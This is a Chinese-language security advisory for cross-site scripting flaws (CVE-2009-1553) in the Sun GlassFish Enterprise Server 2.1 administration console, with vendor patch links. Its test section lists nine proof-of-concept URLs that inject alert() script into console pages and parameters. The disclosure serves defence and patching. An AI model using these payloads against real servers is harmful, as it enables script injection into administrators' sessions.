Glassfish Enterprise Server管理控制台多个跨站脚本漏洞
发布日期:2009-05-05
更新日期:2009-05-06
受影响系统:Sun Glassfish Enterprise Server 2.1
描述:
BUGTRAQ ID:
34824
CVE(CAN) ID:
CVE-2009-1553
Sun GlassFish Enterprise Server是供GlassFish社区使用的综合支持服务,是用于构建和部署下一代应用程序和服务的开源和开放社区平台。
GlassFish Enterprise Server的管理控制台没有正确地验证URL字符串和GET请求参数,远程攻击者可以通过向服务器提交恶意请求执行跨站脚本攻击。
<*来源:Digital Security Research Group
链接:
http://marc.info/?l=bugtraq&m=124153632908448&w=2
http://secunia.com/advisories/35009/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://[server]/applications/applications.jsf?');};alert("DSecRG_XSS");</script><!--
http://[server]/configuration/configuration.jsf?');};alert("DSecRG_XSS");</script><!--
http://[server]/customMBeans/customMBeans.jsf?');};alert("DSecRG_XSS");</script><!--
http://[server]/resourceNode/resources.jsf?');};alert("DSecRG_XSS");</script><!--
http://[server]/sysnet/registration.jsf?');};alert("DSecRG_XSS");</script><!--
http://[server]/webService/webServicesGeneral.jsf?');};alert("DSecRG_XSS");</script><!
http://[server]/configuration/auditModuleEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>
http://[server]/configuration/httpListenerEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>&configName=server-config
http://[server]/resourceNode/jdbcResourceEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>
建议:
厂商补丁:
Sun
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://glassfish.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=29669
https://glassfish.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=29668
https://glassfish.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=29675浏览次数:2529
严重程度:0(网友投票)
